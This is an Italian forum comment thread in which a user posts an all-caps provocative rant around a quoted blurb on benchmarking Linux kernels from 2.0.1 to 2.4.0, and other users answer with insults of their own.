  • Andate qua ad imparare qualcosa di LINUX e che cosa è LINUX, io lo so, VOI?????

    Voi che fate tanto gli offesi per le mie PROVOCAZIONI????

    Voi,.......SAPETE LEGGERE?????


    "Three students and a professor from Northern Michigan University benchmarked a bunch of Linux kernels, from 2.0.1 to 2.4.0 Many subsystems improved in performance, but some did not. Lines of code have tripled, and are on an exponential growth curve. Come see the results."


    Voi,......SAPETE COSA SONI I BENCKMARK e li SAPETE interpretare?????


    O SIETE SOLO DEI BUFFONI IMPOMATATI PIENI SOLO DI VOI STESSI E DEL VOSTRO PRESUNTO SAPERE?????

    CHE CAZZO IMPARATE NELLE VOSTRE UNIVERSITA??????

    CI ANDATE SOLO PER IMPARARE A COME MEGLIO DRAGARE LA GENTE OPPURE ANCHE PER IL VOSTRO PIACERE E LA VOSTRA CRESCITA PERSONALE ED UMANA?????

    COSA VI INSEGNANO I VOSTRI PROFESSORI?????

    SPUTATE L' OSSO, SE NE SIETE ANCORA CAPACI!!!!!!!!!!


    non+autenticato


  • - Scritto da: Alien
    >
    > CHE CAZZO IMPARATE NELLE VOSTRE
    > UNIVERSITA??????

    Innanzitutto l'educazione.
    non+autenticato


  • - Scritto da: Alien
    > Andate qua ad imparare qualcosa di LINUX e
    > che cosa è LINUX, io lo so, VOI?????
    >
    > Voi che fate tanto gli offesi per le mie
    > PROVOCAZIONI????
    >
    > Voi,.......SAPETE LEGGERE?????
    >
    Sì, penso.

    > "Three students and a professor from
    > Northern Michigan University benchmarked a
    > bunch of Linux kernels, from 2.0.1 to 2.4.0
    > Many subsystems improved in performance, but
    > some did not. Lines of code have tripled,
    > and are on an exponential growth curve. Come
    > see the results."
    >
    >
    > Voi,......SAPETE COSA SONI I BENCKMARK e li
    > SAPETE interpretare?????
    >
    Sì, tu?

    > O SIETE SOLO DEI BUFFONI IMPOMATATI PIENI
    > SOLO DI VOI STESSI E DEL VOSTRO PRESUNTO
    > SAPERE?????

    No, l'unico buffone sei tu, non temere, nessuno ti ruba il posto.

    > CHE CAZZO IMPARATE NELLE VOSTRE
    > UNIVERSITA??????

    Un sacco di cose per te inaccessibili

    > CI ANDATE SOLO PER IMPARARE A COME MEGLIO
    > DRAGARE LA GENTE OPPURE ANCHE PER IL VOSTRO
    > PIACERE E LA VOSTRA CRESCITA PERSONALE ED
    > UMANA?????
    >
    > COSA VI INSEGNANO I VOSTRI PROFESSORI?????

    Sei così arrabbiato solo xkè non ti hanno preso?Non hai passato l'esame di ammissione?Sei fuori corso?E' troppo difficile l'uni x un genio come te?

    > SPUTATE L' OSSO, SE NE SIETE ANCORA
    > CAPACI!!!!!!!!!!
    >
    Mah, io ti sputerei addosso non solo 1osso.

    non+autenticato
CONTINUA A LEGGERE I COMMENTI
1 | 2 | 3 | 4 | Successiva
(pagina 1/4 - 17 discussioni)